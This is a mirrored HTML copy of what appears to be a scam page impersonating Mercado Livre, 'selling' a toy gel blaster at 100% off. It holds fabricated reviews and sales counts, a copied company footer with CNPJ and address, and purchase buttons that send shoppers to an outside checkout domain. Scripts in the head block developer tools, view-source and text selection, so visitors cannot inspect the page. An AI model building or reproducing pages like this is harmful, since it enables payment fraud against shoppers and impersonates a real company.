<html lang="pt-br">
<!-- Mirrored from recentessnoticias.online/orbi/loja/akAzul.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 12 Sep 2024 04:22:31 GMT -->
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <title>Mercado Livre</title>

  
  <script>
      document.onkeydown = function(e) {
          if(event.keyCode == 123) {
              return false;
          }
          if(e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)){
              return false;
          }
          if(e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)){
              return false;
          }
          if(e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)){
              return false;
          }
      }
  </script>
  
  <script>
      document.onkeydown = function(e) {
          if(event.keyCode == 123) {
              return false;
          }
          if(e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)){
              return false;
          }
          if(e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)){
              return false;
          }
          if(e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)){
              return false;
          }
      }
  </script>
  
  <script>
      function disableselect(e) {
          return false;
      }
  
      function reEnable() {
          return true;
      }
  
      document.onselectstart = new Function("return false");
  
      if (window.sidebar) {
          document.onmousedown = disableselect;
          document.onclick = reEnable;
      }
  </script><meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  <link rel="stylesheet" href="css/products.css">
  <link rel="stylesheet" href="css/styles.css">
  <link rel="stylesheet" href="css/fonts.css">
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@24,400,1,0">
  <link rel="icon" href="images/favicon.png">
  <link rel="shortcut icon" href="images/favicon.png">      <title>Mercado Livre</title>
     </head>
     <body cz-shortcut-listen="true">
        <div style="background-color: #e6cf00; text-align: center; padding: 5px; font-family: 'GellixMedium'; font-size: 13px; color: white">Promoção exclusiva: Dias das Crianças</div>
        <nav class="navbar" style="padding-top: 15px;">
           <div class="menu-icon" style="padding-left: 3%;" onclick="window.location.href='index-2.html';">
              <span style="font-family: 'GellixMedium'; color: black;">❮ Voltar</span>
           </div>
           <div class="logo-central">
              <img src="images/logo.webp" style="height: 5vh;" alt="Logo Central Vivara">
           </div>
           <div class="menu-icon" style="padding-right: 3%;">
              <span class="material-symbols-outlined" style="font-size: 30px; padding-right: 0px; color: black">shopping_cart</span>
           </div>
        </nav>
        <div class="product-info-custom" style="padding-top: 15px; font-family: 'GellixRegular'; color: #9F9F9F;">
           <div class="product-status-custom">
              <span> +5mil vendidos </span>
           </div>
           <div class="product-rating-custom" style="padding-right: 3%; font-family: 'GellixRegular'; color: #9F9F9F;">
              <span> 4.8 </span>
              <span class="stars-custom">
              <span class="star-custom" style="color: #3483FA;">★</span>
              <span class="star-custom" style="color: #3483FA;">★</span>
              <span class="star-custom" style="color: #3483FA;">★</span>
              <span class="star-custom" style="color: #3483FA;">★</span>
              <span class="half-star-custom" style="color: #3483FA;">★</span>
              </span>
              <span> (2379) </span>
           </div>
        </div>
        <p class="title" style="margin-top: 10px;">Lançador OrbiGel AK - Azul</p>
        <section class="product-display">
           <img src="images/akazul_1.png" alt="Fralda Principal" class="main-image" style="width: 70%; border-radius: 15px; margin: 0 auto; display: flex; margin-top:-10px">
           <div class="thumbnails">
              <img src="images/akazul_1.png" alt="Fralda Vista 1" style="border-radius: 15px;">
              <img src="images/akazul_2.png" alt="Fralda Vista 2" style="border-radius: 15px;">
              <img src="images/akazul_3.png" alt="Fralda Vista 3" style="border-radius: 15px;">
              <img src="images/akazul_4.png" alt="Fralda Vista 3" style="border-radius: 15px;">
           </div>
        </section>
        <div class="product-info2">
           <div class="offer-tag2">OFERTA DO DIA</div>
           <div class="old-price2">R$ 226,90</div>
           <span class="new-price2">R$ 0,00</span><span class="discount2">100% OFF</span>
           <div class="free-shipping-container">
              <span class="free-shipping2" style="font-family: 'GellixMedium';">Frete<span class="material-symbols-outlined" style="margin-right: 3px; color: #4caf50;">bolt</span><span style="font-family: 'GellixSemiBold';">FULL</span></span>
           </div>
        </div>
        <button class="pergunta-botao" href="#" onclick="window.open('https://checkout.payfacilitador.shop/VCCL1O8SBEKI')">Comprar</button>

        
        <div class="promocao">
           <p class="promotitle">Ofertas especiais 🔥</p>
           <div class="button-container" href="#" onclick="window.open('https://checkout.payfacilitador.shop/VCCL1O8SBEKQ')">
              <button class="styled-button" style="background-color: #ffffff;">
              <span class="button-text">
              <span class="button-title" style="color: #0169EB">LEVAR 2 UNIDADES</span>
              <span class="button-subtitle" style="color: #0169EB">Por apenas R$ 27,64</span>
              </span>
              <span class="material-symbols-outlined" style="font-size: 32px; color: #0169EB;">sell</span>
              </button>
           </div>
        </div>
        

        <div class="info-container">
           <div class="info-item">
              <span class="material-symbols-outlined">undo</span>
              <span class="info-text"><a href="#">Devolução grátis.</a> Você tem 30 dias a partir da data de recebimento.</span>
           </div>
           <div class="info-item">
              <span class="material-symbols-outlined">verified_user</span>
              <span class="info-text"><a href="#">Compra Garantida,</a> receba o produto que está esperando ou devolvemos o dinheiro.</span>
           </div>
           <div class="info-item">
              <span class="material-symbols-outlined">emoji_events</span>
              <span class="info-text">12 meses de garantia de fábrica.</span>
           </div>
        </div>
        <div class="button-container">
           <button id="favoriteButton" class="action-button">
           <span id="favoriteIcon" class="material-symbols-outlined" style="color: #007bff">favorite_border</span>
           <span id="favoriteText">Adicionar aos favoritos</span>
           </button>
           <button id="shareButton" class="action-button">
           <span class="material-symbols-outlined" style="color: #007bff">share</span>
           Compartilhar
           </button>
        </div>
        <div id="notification" class="notification hidden">Link copiado com sucesso!</div>
        <div class="divisoria"></div>
        <p style="padding-left: 4%; font-family: 'GellixRegular'; font-size: 20px; padding-top: 15px;">Opiniões do produto</p>
        <img src="images/pretorating.png" style="width: 92%; display: flex; margin: 0 auto; padding-top: 10px; padding-bottom: 10px;">
        <div class="divisoria"></div>
        <p style="padding-left: 4%; font-family: 'GellixRegular'; font-size: 20px; padding-top: 15px;">Opiniões em destaque</p>
        <div class="comment-container">
           <div class="comment">
              <div class="header">
                 <div class="stars">
                    <span class="material-symbols-outlined stars">star</span>
                    <span class="material-symbols-outlined stars">star</span>
                    <span class="material-symbols-outlined stars">star</span>
                    <span class="material-symbols-outlined stars">star</span>
                    <span class="material-symbols-outlined stars">star</span>
                 </div>
                 <div class="date">08 mai. 2024</div>
              </div>
              <p>não é atoa que essa arma é a do momento é muito divertido brincar com isso kkkkk, comprei pro meu filho mas to quase pegando outra pra mim            </p>
              <div class="actions">
                 <button class="like-button" onclick="toggleLike(this)">
                 <span class="material-symbols-outlined" style="color: black">thumb_up</span> É útil <span class="count">49</span>
                 </button>
                 <button class="dislike-button" onclick="toggleDislike(this)">
                 <span class="material-symbols-outlined" style="color: black">thumb_down</span>
                 </button>
              </div>
           </div>
           <div class="comment">
              <div class="header">
                 <div class="stars">
                    <span class="material-symbols-outlined stars">star</span>
                    <span class="material-symbols-outlined stars">star</span>
                    <span class="material-symbols-outlined stars">star</span>
                    <span class="material-symbols-outlined stars">star</span>
                    <span class="material-symbols-outlined stars">star</span>
                 </div>
                 <div class="date">23 mar. 2024</div>
              </div>
              <div class="images">
                 <img src="images/reviews/ak/1.png" alt="Review Image 2">
                 <img src="images/reviews/ak/2.png" alt="Review Image 2">
                 <img src="images/reviews/ak/3.png" alt="Review Image 2">
              </div>
              <p>Comprei inicialmente para dar de presente pro filhão, mas é muito legal a arminha é a segunda que eu compro, vale super a pena pela diversão, ainda mais nessa promo</p>
              <div class="actions">
                 <button class="like-button" onclick="toggleLike(this)">
                 <span class="material-symbols-outlined" style="color: black">thumb_up</span> É útil <span class="count">33</span>
                 </button>
                 <button class="dislike-button" onclick="toggleDislike(this)">
                 <span class="material-symbols-outlined" style="color: black">thumb_down</span>
                 </button>
              </div>
           </div>
        </div>
        <div class="divisoria"></div>
        <p style="margin-left: 3%; margin-right: 3%; font-family: 'GellixRegular'; font-size: 14px; padding-top: 5px;"><span style="font-family: 'GellixSemiBold';">Termos e condições. Como cuidamos da sua privacidade. Acessibilidade Informações sobre seguros Blog Afiliados Tendências</span><br><br>© 1999-2024 Ebazar.com.br LTDA.CNPJ n.º 03.007.331/0001-41 / Av. das Nações Unidas, nº 3.003, Bonfim, Osasco/SP - CEP 06233-903 - empresa do grupo Mercado Livre.<span style="font-family: 'GellixSemiBold';"><br><br>Brasil/Português</span></p>
        <script src="responda.html"></script>
        <script>
           document.querySelectorAll('.thumbnails img').forEach(image => {
               image.addEventListener('click', function() {
                   document.querySelector('.main-image').src = this.src;
               });
           });
           document.getElementById("tv").addEventListener("click", timeTv);
        </script>
     
  
  
  </body><!-- Mirrored from promocaorespondaeganhe.shop/produtos/celular-azul by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 14 Jul 2024 17:40:14 GMT -->
<!-- Mirrored from recentessnoticias.online/orbi/loja/akAzul.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 12 Sep 2024 04:22:35 GMT -->
</html>